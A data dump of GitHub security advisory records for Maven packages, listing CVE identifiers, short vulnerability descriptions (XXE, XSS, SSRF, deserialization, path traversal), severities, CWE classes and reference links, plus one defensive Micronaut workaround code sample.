Maven | GHSA-h3wv-47xm-4mg6 | Moderate severity vulnerability that affects com.kitfox.svg:svg-salamander | The SVG Salamander (aka svgSalamander) library, when used in a web application, allows remote attackers to conduct server-side request forgery (SSRF) attacks via an xlink:href attribute in an SVG file. | {'CVE-2017-5617'} | 2022-03-03T05:12:33.300178Z | 2018-10-19T16:51:25Z | HIGH | null | {'CWE-918'} | {'https://github.com/blackears/svgSalamander/issues/11', 'http://www.debian.org/security/2017/dsa-3781', 'http://www.openwall.com/lists/oss-security/2017/01/27/3', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3V7RIIO3HO4RNDBN2PARLIDAL3RPV2OX/', 'https://security.gentoo.org/glsa/202003-11', 'http://www.openwall.com/lists/oss-security/2017/01/29/2', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPUOI6NCEB6H6YHKN7M4V3CAQD63NXAU/', 'http://www.securityfocus.com/bid/95871', 'https://nvd.nist.gov/vuln/detail/CVE-2017-5617', 'https://github.com/blackears/svgSalamander', 'https://github.com/advisories/GHSA-h3wv-47xm-4mg6'} | null |
Maven | GHSA-62hc-f8qj-5xc3 | Path traversal in Phoenix AutoTest Plugin | Jenkins Pipeline: Phoenix AutoTest Plugin 1.3 and earlier allows attackers with Item/Configure permission to upload arbitrary files from the Jenkins controller via FTP to an attacker-specified FTP server. | {'CVE-2022-28157'} | 2022-04-05T20:05:40.868802Z | 2022-03-30T00:00:22Z | MODERATE | null | {'CWE-22'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-28157', 'https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2684', 'http://www.openwall.com/lists/oss-security/2022/03/29/1', 'https://github.com/jenkinsci/phoenix-autotest-plugin'} | null |
Maven | GHSA-36hf-6hp2-9g4c | Local file inclusion allows unauthorized access to internal resources in Alkacon OpenCms | In Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple resources vulnerable to Local File Inclusion that allow an attacker to access server resources: clearhistory.jsp, convertxml.jsp, group_new.jsp, loginmessage.jsp, xmlcontentrepair.jsp, and /system/workplace/admin/history/settings/index.jsp. | {'CVE-2019-13237'} | 2022-04-19T20:15:09.918154Z | 2019-11-12T22:58:14Z | MODERATE | null | {'CWE-200', 'CWE-22'} | {'https://github.com/alkacon/opencms-core', 'http://packetstormsecurity.com/files/154281/Alkacon-OpenCMS-10.5.x-Local-File-Inclusion.html', 'https://github.com/alkacon/opencms-core/commits/branch_10_5_x', 'https://aetsu.github.io/OpenCms', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13237'} | null |
Maven | GHSA-3gg7-9q2x-79fc | Improper Restriction of Rendered UI Layers or Frames in Keycloak | A vulnerability was found in all versions of Keycloak where, the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors. | {'CVE-2020-1728'} | 2022-03-03T05:14:13.205229Z | 2020-04-15T21:09:40Z | MODERATE | null | {'CWE-1021'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1728', 'https://issues.redhat.com/browse/KEYCLOAK-12264', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1728'} | null |
Maven | GHSA-2h3j-m7gr-25xj | Excessive Iteration Denial of Service in Apache PDFBox | A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions. | {'CVE-2021-27807'} | 2022-04-22T18:30:12.280832Z | 2021-06-16T17:56:46Z | MODERATE | null | {'CWE-834'} | {'https://lists.apache.org/thread.html/r043edc5dcf9199f7f882ed7906b41cb816753766e88b8792dbf319a9@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/rc69140d894c6a9c67a8097a25656cce59b46a5620c354ceba10543c3@%3Cnotifications.ofbiz.apache.org%3E', 'https://svn.apache.org/viewvc?view=revision&revision=1886911', 'https://github.com/apache/pdfbox', 'https://lists.apache.org/thread.html/r4717f902f8bc36d47b3fa978552a25e4ed3ddc2fffb52b94fbc4ab36@%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/r5c8e2125d18af184c80f7a986fbe47eaf0d30457cd450133adc235ac@%3Ccommits.ofbiz.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27807', 'https://lists.apache.org/thread.html/r9ffe179385637b0b5cbdabd0246118005b4b8232909d2d14cd68ccd3@%3Ccommits.ofbiz.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread.html/r6e067a6d83ccb6892d0ff867bd216704f21fb0b6a854dea34be04f12@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PT72QOFDXLJ7PLTN66EMG5EHPTE7TFZ/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KDA2U4KL2N3XT3PM4ZJEBBA6JJIH2G4/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AVLKAHFMPH72TTP25INPZPGX5FODK3H/', 'https://lists.apache.org/thread.html/raa35746227f3f8d50fff1db9899524423a718f6f35cd39bd4769fa6c@%3Cnotifications.ofbiz.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/03/19/9', 'https://lists.apache.org/thread.html/r1d268642f8b52456ee8f876b888b8ed7a9e9568c7770789f3ded7f9e@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/re1e35881482e07dc2be6058d9b44483457f36133cac67956686ad9b9@%3Cnotifications.ofbiz.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/r1218e60c32829f76943ecaca79237120c2ec1ab266459d711a578b50@%3Cdev.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/r7ee634c21816c69ce829d0c41f35afa2a53a99bdd3c7cce8644fdc0e@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb%40%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb@%3Cusers.pdfbox.apache.org%3E', 'https://issues.apache.org/jira/browse/PDFBOX-4892', 'https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E', 'https://github.com/apache/pdfbox/commit/5c5a837140fbb4ef78bb5ef9f29ad537c872c83e', 'https://www.oracle.com/security-alerts/cpuoct2021.html'} | null |
Maven | GHSA-j346-h5wc-rw2m | Incorrect Authorization in Apache Solr | In Apache Solr, the cluster can be partitioned into multiple collections and only a subset of nodes actually host any given collection. However, if a node receives a request for a collection it does not host, it proxies the request to a relevant node and serves the request. Solr bypasses all authorization settings for such requests. This affects all Solr versions prior to 7.7 that use the default authorization mechanism of Solr (RuleBasedAuthorizationPlugin). | {'CVE-2018-11802'} | 2022-03-03T05:13:20.778351Z | 2022-02-09T23:19:26Z | MODERATE | null | {'CWE-863'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-11802', 'https://www.openwall.com/lists/oss-security/2019/04/24/1'} | null |
Maven | GHSA-hr32-mgpm-qf2f | Generation of Error Message Containing Sensitive Information in RESTEasy client | A flaw was found in RESTEasy client in all versions of RESTEasy up to 4.5.6.Final. It may allow client users to obtain the server's potentially sensitive information when the server got WebApplicationException from the RESTEasy client call. The highest threat from this vulnerability is to data confidentiality. | {'CVE-2020-25633'} | 2022-03-11T20:31:57.846588Z | 2021-06-03T23:41:34Z | MODERATE | null | {'CWE-209'} | {'https://issues.redhat.com/browse/RESTEASY-2820', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25633', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25633', 'https://github.com/resteasy/Resteasy/pull/2665/commits/13c808b5967242eec1e877edbc0014a84dcd6eb0'} | null |
Maven | GHSA-wg5w-vv93-3f7w | Moderate severity vulnerability that affects org.apache.oozie:oozie-core | Vulnerability allows a user of Apache Oozie 3.1.3-incubating to 5.0.0 to impersonate other users. The malicious user can construct an XML that results workflows running in other user's name. | {'CVE-2018-11799'} | 2022-03-03T05:14:20.755734Z | 2018-12-20T22:01:18Z | MODERATE | null | {'CWE-20'} | {'https://lists.apache.org/thread.html/347e7a8cb86014b7ca37e49eb00b8d088203bdc0bcfb4799f8e5955a@%3Cuser.oozie.apache.org%3E', 'https://github.com/advisories/GHSA-wg5w-vv93-3f7w', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11799', 'http://www.securityfocus.com/bid/106266'} | null |
Maven | GHSA-h592-38cm-4ggp | High severity vulnerability that affects com.fasterxml.jackson.core:jackson-databind | A deserialization flaw was discovered in the jackson-databind in versions before 2.8.10 and 2.9.1, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting more classes that could be used maliciously. | {'CVE-2017-15095'} | 2022-03-03T05:13:37.140143Z | 2018-10-18T17:42:34Z | CRITICAL | null | {'CWE-502', 'CWE-184'} | {'https://access.redhat.com/errata/RHSA-2018:0576', 'https://access.redhat.com/errata/RHSA-2018:0480', 'https://access.redhat.com/errata/RHSA-2019:3892', 'https://access.redhat.com/errata/RHSA-2018:1448', 'http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html', 'https://access.redhat.com/errata/RHSA-2018:2927', 'https://access.redhat.com/errata/RHSA-2018:0481', 'https://security.netapp.com/advisory/ntap-20171214-0003/', 'https://access.redhat.com/errata/RHSA-2018:0342', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15095', 'https://access.redhat.com/errata/RHSA-2018:0479', 'https://access.redhat.com/errata/RHSA-2018:1449', 'https://access.redhat.com/errata/RHSA-2019:3149', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html', 'https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html', 'https://access.redhat.com/errata/RHSA-2018:1451', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/advisories/GHSA-h592-38cm-4ggp', 'https://access.redhat.com/errata/RHSA-2018:1447', 'http://www.securityfocus.com/bid/103880', 'https://www.debian.org/security/2017/dsa-4037', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://github.com/FasterXML/jackson-databind/issues/1680', 'https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'http://www.securitytracker.com/id/1039769', 'https://access.redhat.com/errata/RHSA-2017:3190', 'https://access.redhat.com/errata/RHSA-2019:2858', 'https://access.redhat.com/errata/RHSA-2018:1450', 'https://access.redhat.com/errata/RHSA-2018:0577', 'https://access.redhat.com/errata/RHSA-2017:3189', 'https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/1737', 'https://access.redhat.com/errata/RHSA-2018:0478'} | null |
Maven | GHSA-3v44-382q-55f4 | Moderate severity vulnerability that affects org.apache.hadoop:hadoop-main | Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host. | {'CVE-2017-15713'} | 2022-03-03T05:11:14.373729Z | 2018-12-21T17:50:13Z | MODERATE | null | {'CWE-200'} | {'https://github.com/advisories/GHSA-3v44-382q-55f4', 'https://lists.apache.org/thread.html/a790a251ace7213bde9f69777dedb453b1a01a6d18289c14a61d4f91@%3Cgeneral.hadoop.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15713'} | null |
Maven | GHSA-mh83-jcw5-rjh8 | XML External Entity Reference in edu.stanford.nlp:stanford-corenlp | The TransformXML() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. | {'CVE-2022-0198'} | 2022-03-03T05:13:04.921797Z | 2022-01-14T21:07:23Z | MODERATE | null | {'CWE-611'} | {'https://github.com/stanfordnlp/corenlp/commit/1f52136321cfca68b991bd7870563d06cf96624d', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0198', 'https://github.com/stanfordnlp/corenlp/', 'https://huntr.dev/bounties/3d7e70fe-dddd-4b79-af62-8e058c4d5763'} | null |
Maven | GHSA-9953-fmrw-v4vm | Cross-site Scripting in Apache JSPWiki | A carefully crafted user preferences for submission could trigger an XSS vulnerability on Apache JSPWiki, related to the user preferences screen, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.2 or later. | {'CVE-2022-24948'} | 2022-03-07T20:47:41.730975Z | 2022-02-26T00:00:44Z | MODERATE | null | {'CWE-79'} | {'https://lists.apache.org/thread/86p0yzopc4mw2h5bkwpt927b2c8tfq3b', 'http://www.openwall.com/lists/oss-security/2022/02/25/2', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24948'} | null |
Maven | GHSA-66gw-ch5v-74v8 | Cross-site scripting (XSS) in Apache ActiveMQ | An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the message.jsp page of Apache ActiveMQ versions 5.15.12 through 5.16.0. | {'CVE-2020-13947'} | 2022-03-03T05:13:21.646499Z | 2022-02-09T22:01:32Z | MODERATE | null | {'CWE-79'} | {'https://lists.apache.org/thread.html/r021c490028f61c8b6f7e38efb98e61693b0cbb6b99b02238c6fc7d66@%3Ccommits.activemq.apache.org%3E', 'http://activemq.apache.org/security-advisories.data/CVE-2020-13947-announcement.txt', 'https://lists.apache.org/thread.html/ra66791f1f2b59fa651a81cec5202acdfbf34c2154fc0ff200301cc1c@%3Cusers.activemq.apache.org%3E', 'https://lists.apache.org/thread.html/ra66791f1f2b59fa651a81cec5202acdfbf34c2154fc0ff200301cc1c@%3Cdev.activemq.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13947'} | null |
Maven | GHSA-2457-2263-mm9f | Memory leak in micronaut-core | ### Impact
Sending an invalid Content Type header leads to memory leak in `DefaultArgumentConversionContext` as this type is erroneously used in static state.
### Patches
The problem is patched in Micronaut 3.2.7 and above.
### Workarounds
The default content type binder can be replaced in an existing Micronaut application to mitigate the issue:
```java
package example;
import java.util.List;
import io.micronaut.context.annotation.Replaces;
import io.micronaut.core.convert.ConversionService;
import io.micronaut.http.MediaType;
import io.micronaut.http.bind.DefaultRequestBinderRegistry;
import io.micronaut.http.bind.binders.RequestArgumentBinder;
import jakarta.inject.Singleton;
@Singleton
@Replaces(DefaultRequestBinderRegistry.class)
class FixedRequestBinderRegistry extends DefaultRequestBinderRegistry {
public FixedRequestBinderRegistry(ConversionService conversionService,
List<RequestArgumentBinder> binders) {
super(conversionService, binders);
}
@Override
protected void registerDefaultConverters(ConversionService<?> conversionService) {
super.registerDefaultConverters(conversionService);
conversionService.addConverter(CharSequence.class, MediaType.class, charSequence -> {
try {
return MediaType.of(charSequence);
} catch (IllegalArgumentException e) {
return null;
}
});
}
}
```
### References
Commit that introduced the vulnerability https://github.com/micronaut-projects/micronaut-core/commit/b8ec32c311689667c69ae7d9f9c3b3a8abc96fe3
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Micronaut Core](https://github.com/micronaut-projects/micronaut-core/issues)
* Email us at [info@micronaut.io](mailto:info@micronaut.io)
| {'CVE-2022-21700'} | 2022-03-03T05:11:18.519092Z | 2022-01-21T23:19:36Z | MODERATE | null | {'CWE-400'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-21700', 'https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-2457-2263-mm9f', 'https://github.com/micronaut-projects/micronaut-core/', 'https://github.com/micronaut-projects/micronaut-core/commit/b8ec32c311689667c69ae7d9f9c3b3a8abc96fe3'} | null |
Maven | GHSA-2mq8-99q7-55wx | Code injection in keycloak | A flaw was found in keycloak. The new account console in keycloak can allow malicious code to be executed using the referrer URL. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. | {'CVE-2021-20222'} | 2022-03-03T05:12:40.262840Z | 2021-05-13T22:29:51Z | HIGH | null | {'CWE-20'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=1924606', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20222', 'https://github.com/keycloak/keycloak/commit/3b80eee5bfdf2b80c47465c0f2eaf70074808741', 'https://access.redhat.com/security/cve/cve-2021-20222'} | null |
Maven | GHSA-m4h3-7mc2-v295 | An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations. | An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations. | {'CVE-2020-35214'} | 2022-03-03T05:13:03.318122Z | 2021-12-17T20:41:21Z | HIGH | null | null | {'https://docs.google.com/presentation/d/1wJi4QJko5ZCdADuzmAG9ed-nQLyJVkLBJf6cylAL71A/edit?usp=sharing', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35214', 'https://github.com/atomix/atomix'} | null |
Maven | GHSA-387v-84cv-9qmc | Moderate severity vulnerability that affects org.apache.solr:solr-core | When using the Index Replication feature, Apache Solr nodes can pull index files from a master/leader node using an HTTP API which accepts a file name. However, Solr before 5.5.4 and 6.x before 6.4.1 did not validate the file name, hence it was possible to craft a special request involving path traversal, leaving any file readable to the Solr server process exposed. Solr servers protected and restricted by firewall rules and/or authentication would not be at risk since only trusted clients and users would gain direct HTTP access. | {'CVE-2017-3163'} | 2022-03-03T05:13:43.661227Z | 2018-10-18T16:40:43Z | HIGH | null | {'CWE-22'} | {'https://access.redhat.com/errata/RHSA-2018:1447', 'https://access.redhat.com/errata/RHSA-2018:1449', 'https://access.redhat.com/errata/RHSA-2018:1450', 'https://github.com/advisories/GHSA-387v-84cv-9qmc', 'https://access.redhat.com/errata/RHSA-2018:1448', 'https://lists.apache.org/thread.html/a6a33a186f293f9f9aecf3bd39c76252bfc49a79de4321dd2a53b488@%3Csolr-user.lucene.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:1451', 'https://www.debian.org/security/2018/dsa-4124', 'https://nvd.nist.gov/vuln/detail/CVE-2017-3163'} | null |
Maven | GHSA-c7f6-4vx5-4263 | Unrestricted Upload of File with Dangerous Type in Liferay Portal and Liferay DXP | Liferay Portal before 7.3.3, and Liferay DXP 7.1 before fix pack 18 and 7.2 before fix pack 6, does not restrict the size of a multipart/form-data POST action, which allows remote authenticated users to conduct denial-of-service attacks by uploading large files. | {'CVE-2020-15839'} | 2022-03-03T05:13:24.502350Z | 2022-02-10T20:46:21Z | MODERATE | null | {'CWE-434'} | {'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/119784928', 'https://portal.liferay.dev/learn/security/known-vulnerabilities', 'https://issues.liferay.com/browse/LPE-17029', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15839', 'https://issues.liferay.com/browse/LPE-17055'} | null |
Maven | GHSA-v7wg-cpwc-24m4 | Unchecked Class Instantiation when providing Plugin Classes | pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property). | {'CVE-2022-21724'} | 2022-04-17T16:46:56.844044Z | 2022-02-02T00:04:20Z | HIGH | null | {'CWE-668', 'CWE-74', 'CWE-665'} | {'https://security.netapp.com/advisory/ntap-20220311-0005/', 'https://github.com/pgjdbc/pgjdbc', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21724', 'https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813', 'https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/'} | null |
Maven | GHSA-crh4-294p-vcfq | Regular expression denial of service (ReDoS) in EmailField component in Vaadin 14 and 15-17 | Unsafe validation RegEx in `EmailField` component in `com.vaadin:vaadin-text-field-flow` versions 2.0.4 through 2.3.2 (Vaadin 14.0.6 through 14.4.3), and 3.0.0 through 4.0.2 (Vaadin 15.0.0 through 17.0.10) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.
- https://vaadin.com/security/cve-2021-31405 | null | 2022-03-03T05:14:10.356842Z | 2021-04-19T14:53:20Z | HIGH | null | {'CWE-400'} | {'https://github.com/vaadin/flow-components/security/advisories/GHSA-crh4-294p-vcfq', 'https://vaadin.com/security/cve-2021-31405', 'https://github.com/vaadin/flow-components'} | null |
Maven | GHSA-qh3m-qw6v-qvhg | Moderate severity vulnerability that affects io.vertx:vertx-core | In version from 3.5.Beta1 to 3.5.3 of Eclipse Vert.x, the OpenAPI XML type validator creates XML parsers without taking appropriate defense against XML attacks. This mechanism is exclusively when the developer uses the Eclipse Vert.x OpenAPI XML type validator to validate a provided schema. | {'CVE-2018-12544'} | 2022-03-03T05:13:26.091151Z | 2018-10-17T16:20:32Z | MODERATE | null | {'CWE-611'} | {'https://github.com/advisories/GHSA-qh3m-qw6v-qvhg', 'https://github.com/vert-x3/vertx-web/issues/1021', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=539568', 'https://access.redhat.com/errata/RHSA-2018:2946', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-12544'} | null |
Maven | GHSA-96jq-75wh-2658 | Moderate severity vulnerability that affects apache axis | Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services. | {'CVE-2018-8032'} | 2022-03-03T05:13:52.365977Z | 2018-10-16T20:51:15Z | MODERATE | null | {'CWE-79'} | {'https://lists.debian.org/debian-lts-announce/2021/11/msg00015.html', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3CJIRA.13170716.1531060536000.93536.1531060560060@Atlassian.JIRA%3E', 'https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041@%3Cjava-dev.axis.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/advisories/GHSA-96jq-75wh-2658', 'https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b@%3Cjava-dev.axis.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8032', 'https://issues.apache.org/jira/browse/AXIS-2924', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'} | null |
Maven | GHSA-jjhw-5mxp-2g2q | Cross-site Scripting in OpenNMS Horizon | In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function `validateFormInput()` performs improper validation checks on the input sent to the `groupName` and `groupComment` parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms. | {'CVE-2021-25933'} | 2021-05-28T22:27:50Z | 2021-05-25T18:47:01Z | MODERATE | null | {'CWE-79'} | {'https://github.com/OpenNMS/opennms/commit/8a97e6869d6e49da18b208c837438ace80049c01,', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25933', 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c', 'https://nvd.nist.gov/vuln/detail/CVE-2021-25933', 'https://github.com/OpenNMS/opennms/commit/f3ebfa3da5352b4d57f238b54c6db315ad99f10e'} | null |
Maven | GHSA-7m27-3587-83xf | Privilege Defined With Unsafe Actions in Keycloak | A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user. | {'CVE-2019-10170'} | 2022-03-03T05:12:41.091023Z | 2021-10-21T17:46:27Z | HIGH | null | {'CWE-267'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10170', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10170', 'https://github.com/keycloak/keycloak'} | null |
Maven | GHSA-ffjh-fjgg-mfpq | Moderate severity vulnerability that affects org.apache.ranger:ranger | In environments that use external location for hive tables, Hive Authorizer in Apache Ranger before 0.7.1 should be checking RWX permission for create table. | {'CVE-2017-7677'} | 2022-03-03T05:13:05.939457Z | 2018-10-17T17:22:49Z | MODERATE | null | {'CWE-862'} | {'http://www.securityfocus.com/bid/98961', 'https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7677', 'https://github.com/advisories/GHSA-ffjh-fjgg-mfpq'} | null |
Maven | GHSA-8222-6fc8-mhvf | Vulnerability that affects org.springframework.ws:spring-ws and org.springframework.ws:spring-xml | Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources. | {'CVE-2019-3773'} | 2022-03-03T05:14:13.961852Z | 2019-01-25T16:18:52Z | CRITICAL | null | {'CWE-611'} | {'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3773', 'https://github.com/advisories/GHSA-8222-6fc8-mhvf', 'https://pivotal.io/security/cve-2019-3773', 'https://www.oracle.com/security-alerts/cpuApr2021.html'} | null |
Maven | GHSA-h376-j262-vhq6 | RCE in H2 Console | ### Impact
H2 Console in versions since 1.1.100 (2008-10-14) to 2.0.204 (2021-12-21) inclusive allows loading of custom classes from remote servers through JNDI.
H2 Console doesn't accept remote connections by default. If remote access was enabled explicitly and some protection method (such as security constraint) wasn't set, an intruder can load own custom class and execute its code in a process with H2 Console (H2 Server process or a web server with H2 Console servlet).
It is also possible to load them by creation a linked table in these versions, but it requires `ADMIN` privileges and user with `ADMIN` privileges has full access to the Java process by design. These privileges should never be granted to untrusted users.
### Patches
Since version 2.0.206 H2 Console and linked tables explicitly forbid attempts to specify LDAP URLs for JNDI. Only local data sources can be used.
### Workarounds
H2 Console should never be available to untrusted users.
`-webAllowOthers` is a dangerous setting that should be avoided.
H2 Console Servlet deployed on a web server can be protected with a security constraint:
https://h2database.com/html/tutorial.html#usingH2ConsoleServlet
If `webAllowOthers` is specified, you need to uncomment and edit `<security-role>` and `<security-constraint>` as necessary. See documentation of your web server for more details.
### References
This issue was found and privately reported to H2 team by [JFrog Security](https://www.jfrog.com/)'s vulnerability research team with detailed information.
| {'CVE-2021-42392'} | 2022-04-22T15:47:22.234362Z | 2022-01-06T23:55:09Z | CRITICAL | null | {'CWE-502'} | {'https://github.com/h2database/h2database/releases/tag/version-2.0.206', 'https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/', 'https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html', 'https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-42392', 'https://security.netapp.com/advisory/ntap-20220119-0001/', 'https://github.com/h2database/h2database', 'https://www.debian.org/security/2022/dsa-5076'} | null |
Maven | GHSA-7px3-6f6g-hxcj | Moderate severity vulnerability that affects org.apache.solr:solr-core | This vulnerability in Apache Solr 6.0.0 to 6.6.4 and 7.0.0 to 7.3.1 relates to an XML external entity expansion (XXE) in Solr config files (currency.xml, enumsConfig.xml referred from schema.xml, TIKA parsecontext config file). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. The manipulated files can be uploaded as configsets using Solr's API, allowing to exploit that vulnerability. | {'CVE-2018-8026'} | 2022-03-03T05:13:34.470396Z | 2018-10-17T19:55:34Z | MODERATE | null | {'CWE-611'} | {'https://issues.apache.org/jira/browse/SOLR-12450', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8026', 'http://www.securityfocus.com/bid/104690', 'https://security.netapp.com/advisory/ntap-20190307-0002/', 'https://github.com/advisories/GHSA-7px3-6f6g-hxcj', 'https://mail-archives.apache.org/mod_mbox/lucene-solr-user/201807.mbox/%3C0cdc01d413b7%24f97ba580%24ec72f080%24%40apache.org%3E'} | null |
